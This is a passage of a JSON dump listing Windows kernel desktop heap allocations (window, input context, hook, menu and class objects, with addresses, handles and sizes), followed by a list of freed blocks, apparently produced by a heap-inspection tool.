":8},{"Block":"0xffffc8d500614e30","Type":"INPUTCONTEXT","Handle":"0x1019b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616820","Type":"WINDOW","Handle":"0x1019e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500617fc0","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500615010","Type":"INPUTCON
TEXT","Handle":"0x1019f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616a20","Type":"WINDOW","Handle":"0x101a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616ba0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614b90","Type":"INPUTCONTEXT","Handle":"0x201a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617180","Type":"WINDOW","Handle":"0x201a2","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006173f0","Type":"WINDOW","Handle":"0x101a4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615540","Type":"INPUTCONTEXT","Handle":"0x101a5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617570","Type":"WINDOW","Handle":"0x101a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615620","Type":"INPUTCONTEXT","Handle":"0x101a7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006176f0","Type":"WINDOW","Handle":"0x101a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006178b0","Type":"WINDOW","Handle":"0x101aa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500615f60","Type":"INPUTCONTEXT","Handle":"0x101ab","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d500617bb0","Type":"WINDOW","Handle":"0x101ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615fe0","Type":"INPUTCONTEXT","Handle":"0x101ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006181f0","Type":"WINDOW","Handle":"0x101ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500616050","Type":"INPUTCONTEXT","Handle":"0x101af","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618580","Type":"WINDOW","Handle":"0x101b0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b580","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d5006160c0","Type":"INPUTCONTEXT","Handle":"0x101b1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618800","Type":"WINDOW","Handle":"0x101b2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500618990","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500616130","Type":"INPUTCONTEXT","Handle":"0x101b3","Size":5,"UnusedBytes"
:16},{"Block":"0xffffc8d500618b40","Type":"WINDOW","Handle":"0x101b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500618cd0","Type":"WINDOW","Handle":"0x101b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616670","Type":"INPUTCONTEXT","Handle":"0x101b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618e50","Type":"WINDOW","Handle":"0x101b8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006166e0","Type":"INPUTCONTEXT","Handle":"0x101b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619020","Type":"WINDOW","Handle":"0x101ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616d80","Type":"INPUTCONTEXT","Handle":"0x101bb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619250","Type":"WINDOW","Handle":"0x101bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006196c0","Type":"WINDOW","Handle":"0x101c0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500619bc0","Type":"WINDOW:PROPLIST","Size":8,"UnusedBytes":8},{"Block":"0xffffc8d500616dd0","Type":"HOOK","Handle":"0x201c1","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006199e0","Type":"WINDOW","Handle":"0x101c2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b540","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500616f40","Type":"INPUTCONTEXT","Handle":"0x101c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619c40","Type":"WINDOW","Handle":"0x101c4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616fb0","Type":"INPUTCONTEXT","Handle":"0x101c5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619eb0","Type":"WINDOW","Handle":"0x101c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a060","Type":"WINDOW","Handle":"0x101c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a350","Type":"WINDOW","Handle":"0x101ca","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619840","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500617310","Type":"INPUTCONTEXT","Handle":"0x101cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061a660","Type":"WINDOW","Handle"
:"0x101cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006173a0","Type":"INPUTCONTEXT","Handle":"0x101cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611c30","Type":"WINDOW","Handle":"0x201ce","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500621220","Type":"MENU","Handle":"0x301cf","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628eb0","Type":"MENU:ITEMS","Size":145,"UnusedBytes":16},{"Block":"0xffffc8d50061aca0","Type":"WINDOW","Handle":"0x101d0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061a820","Type":"WINDOW","Handle":"0x201d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616180","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061b1f0","Type":"WINDOW","Handle":"0x101d4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b3d0","Type":"WINDOW","Handle":"0x101d6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620290","Type":"WINDOW","Handle":"0x301da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bb00","Type":"WINDOW","Handle":"0x101dc","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061bfa0","Type":"WINDOW","Handle":"0x101de","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c110","Type":"WINDOW","Handle":"0x101e0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c280","Type":"WINDOW","Handle":"0x101e2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c3f0","Type":"WINDOW","Handle":"0x101e4","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061d190","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50061c5e0","Type":"WINDOW","Handle":"0x101e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c110","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500615370","Type":"INPUTCONTEXT","Handle":"0x101e7","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d50061c9d0","Type":"WINDOW","Handle":"0x101e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617d50","Type":"INPUTCONTEXT","Handle":"0x101e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621fd0","Type":"WINDOW","Han
dle":"0x301ea","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c820","Type":"INPUTCONTEXT","Handle":"0x101ec","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617e30","Type":"INPUTCONTEXT","Handle":"0x101ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cbf0","Type":"INPUTCONTEXT","Handle":"0x101ee","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006180b0","Type":"INPUTCONTEXT","Handle":"0x101ef","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cc40","Type":"WINDOW","Handle":"0x101f0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061cdf0","Type":"INPUTCONTEXT","Handle":"0x101f2","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ce40","Type":"WINDOW","Handle":"0x101f4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061d020","Type":"INPUTCONTEXT","Handle":"0x101f6","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618440","Type":"INPUTCONTEXT","Handle":"0x101f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d090","Type":"INPUTCONTEXT","Handle":"0x101f8","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006189c0","Type":"INPUTCONTEXT","Handle":"0x101f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cb70","Type":"INPUTCONTEXT","Handle":"0x101fa","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618a30","Type":"INPUTCONTEXT","Handle":"0x101fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d250","Type":"WINDOW","Handle":"0x101fc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618fd0","Type":"INPUTCONTEXT","Handle":"0x101fd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d0e0","Type":"INPUTCONTEXT","Handle":"0x101fe","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d3d0","Type":"WINDOW","Handle":"0x10200","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d720","Type":"WINDOW","Handle":"0x10202","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061db80","Type":"INPUTCONTEXT","Handle":"0x20203","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d890","Type":"WINDOW","Handle":"0x10204","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060ef90",
"Type":"INPUTCONTEXT","Handle":"0x60205","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061da00","Type":"WINDOW","Handle":"0x10206","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dbf0","Type":"WINDOW","Handle":"0x10208","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dd70","Type":"WINDOW","Handle":"0x1020a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061def0","Type":"WINDOW","Handle":"0x1020c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061e100","Type":"WINDOW","Handle":"0x1020e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e2a0","Type":"WINDOW","Handle":"0x10210","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604a20","Type":"INPUTCONTEXT","Handle":"0x40211","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061e440","Type":"WINDOW","Handle":"0x10212","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e620","Type":"WINDOW","Handle":"0x10214","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006213d0","Type":"MENU","Handle":"0x5021b","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006288c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d5006113a0","Type":"INPUTCONTEXT","Handle":"0x50225","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622870","Type":"INPUTCONTEXT","Handle":"0x10242","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006228e0","Type":"INPUTCONTEXT","Handle":"0xa0244","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006230f0","Type":"INPUTCONTEXT","Handle":"0x30248","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622bc0","Type":"WINDOW","Handle":"0x3024a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500622d90","Type":"WINDOW","Handle":"0x3024c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623160","Type":"INPUTCONTEXT","Handle":"0x1024e","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006231d0","Type":"INPUTCONTEXT","Handle":"0x20250","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625230","Type":"WINDOW","Handle":"0x40252","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006234b0","Type":"WINDOW","Handle":"0
x30254","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500623680","Type":"WINDOW","Handle":"0x10256","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623ab0","Type":"WINDOW","Handle":"0x10258","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500623d70","Type":"WINDOW","Handle":"0x1025a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624010","Type":"WINDOW","Handle":"0x1025c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006242a0","Type":"WINDOW","Handle":"0x1025e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624530","Type":"WINDOW","Handle":"0x10260","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624cf0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500625bd0","Type":"WINDOW","Handle":"0x20262","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006247a0","Type":"WINDOW","Handle":"0x1026c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609c30","Type":"WINDOW","Handle":"0x70270","Size":25,"UnusedBytes":32},{"Block":"0xffffc8d500627e60","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":8},{"Block":"0xffffc8d500626040","Type":"WINDOW","Handle":"0x40272","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d500624940","Type":"WINDOW","Handle":"0x10274","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500602940","Type":"WINDOW","Handle":"0x2027c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500624d30","Type":"WINDOW","Handle":"0x1027e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624ed0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061be20","Type":"INPUTCONTEXT","Handle":"0x20280","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500624f10","Type":"INPUTCONTEXT","Handle":"0x10284","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006253c0","Type":"INPUTCONTEXT","Handle":"0x10286","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625500","Type":"WINDOW","Handle":"0x10288","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006256b0","Type":"WINDOW","Handle":"0x1028a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625940","Type":"WIND
OW","Handle":"0x1028c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062cb50","Type":"WINDOW","Handle":"0x70298","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500626340","Type":"WINDOW","Handle":"0x6029c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626960","Type":"WINDOW","Handle":"0x7029e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006264d0","Type":"WINDOW","Handle":"0x402a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626b40","Type":"WINDOW","Handle":"0x102aa","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626d20","Type":"WINDOW","Handle":"0x102ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626f00","Type":"WINDOW","Handle":"0x102ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620960","Type":"WINDOW","Handle":"0x202b0","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d50062b030","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":24},{"Block":"0xffffc8d500620f50","Type":"WINDOW","Handle":"0x102b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500628300","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500627fa0","Type":"WINDOW","Handle":"0x102b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500628160","Type":"WINDOW","Handle":"0x202b6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006297c0","Type":"WINDOW","Handle":"0x102b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50062b8f0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":24},{"Block":"0xffffc8d500626af0","Type":"INPUTCONTEXT","Handle":"0x402b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062c500","Type":"WINDOW","Handle":"0x402ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626cd0","Type":"INPUTCONTEXT","Handle":"0x402bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a140","Type":"WINDOW","Handle":"0x102be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626eb0","Type":"INPUTCONTEXT","Handle":"0x102bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a480","Type":"WINDOW","Handle":"0x102c0","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627
090","Type":"INPUTCONTEXT","Handle":"0x102c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a920","Type":"WINDOW","Handle":"0x102c4","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627370","Type":"INPUTCONTEXT","Handle":"0x202c7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061bf00","Type":"INPUTCONTEXT","Handle":"0x202cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500628360","Type":"INPUTCONTEXT","Handle":"0x102e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006283b0","Type":"HOOK","Handle":"0x102e9","Size":8,"UnusedBytes":32},{"Block":"0xffffc8d500629960","Type":"INPUTCONTEXT","Handle":"0x102eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629b90","Type":"INPUTCONTEXT","Handle":"0x202ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50064f3e0","Type":"MENU","Handle":"0x104ab","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064fa80","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50064f480","Type":"MENU","Handle":"0x104ad","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f520","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062ab70","Type":"MENU","Handle":"0x104af","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50062c6c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062cce0","Type":"WINDOW","Handle":"0x304b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50064f270","Type":"WINDOW","Handle":"0x204ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062bd80","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500629ed0","Type":"WINDOW","Handle":"0x204bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006204c0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b260","Type":"CLS:NAME","Size":4,"UnusedBytes":27},{"Block":"0xffffc8d50062ad70","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bdb0","Type":"CLS:NAME","Size":5,"UnusedBytes":37},{"Block":"0xffffc8d50062bfa0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062c050","
Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062be00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062beb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bc60","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bd10","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bac0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bb70","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b920","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b9d0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b780","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b830","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b5e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b690","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b440","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b4f0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b2a0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b350","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b100","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b1b0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062af80","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff90","Type":"CLS:NAME","Size":3,"UnusedBytes":41},{"Block":"0xffffc8d50062ae20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062acc0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d5006155b0","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620570","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620410","Type":"CLS","Size":11,"Unus
edBytes":16},{"Block":"0xffffc8d500629b10","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d5006299b0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500617120","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062a040","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a0f0","Type":"CLS:NAME","Size":3,"UnusedBytes":25},{"Block":"0xffffc8d50062a6d0","Type":"CLS","Size":37,"UnusedBytes":16},{"Block":"0xffffc8d50064f240","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a390","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a440","Type":"CLS:NAME","Size":4,"UnusedBytes":23},{"Block":"0xffffc8d500629d20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629dd0","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a2e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a120","Type":"CLS:NAME","Size":2,"UnusedBytes":9},{"Block":"0xffffc8d500629e00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629eb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d500629c50","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629d00","Type":"CLS:NAME","Size":2,"UnusedBytes":25}]},"Freed":[{"Block":"0xffffc8d500617df0","Size":2},{"Block":"0xffffc8d500612240","Size":2},{"Block":"0xffffc8d500612680","Size":3},{"Block":"0xffffc8d50062bf70","Size":3},{"Block":"0xffffc8d50061ac60","Size":4},{"Block":"0xffffc8d500617a70","Size":5},{"Block":"0xffffc8d500617030","Size":5},{"Block":"0xffffc8d50062bd30","Size":5},{"Block":"0xffffc8d50062c670","Size":5},{"Block":"0xffffc8d50062b1d0","Size":5},{"Block":"0xffffc8d5006214e0","Size":6},{"Block":"0xffffc8d500629be0","Size":7},{"Block":"0xffffc8d50061ae60","Size":7},{"Block":"0xffffc8d50062b880","Size":7},{"Block":"0xffffc8d500629a60","Size":11},{"Block":"0xffffc8d50062aed0","Size":11},{"Block":"0xffffc8d50062ac10","Size":11},{"Block":"0xffffc8d50062b370","Size":13},{"Block":"
0xffffc8d50062b6b0","Size":13},{"Block":"0xffffc8d50062b510","Size":13},{"Block":"0xffffc8d50062bb90","Size":13},{"Block":"0xffffc8d50062b9f0","Size":13},{"Block":"0xffffc8d50061af40","Size":25},{"Block":"0xffffc8d500609aa0","Size":25},{"Block":"0xffffc8d500621be0","Size":25},{"Block":"0xffffc8d5006193f0","Size":28},{"Block":"0xffffc8d500624b30","Size":28},{"Block":"0xffffc8d500616480","Size":29},{"Block":"0xffffc8d500620cb0","Size":42},{"Block":"0xffffc8d50062ce60","Size":8766}]} 2 | --------------------------------------------------------------------------------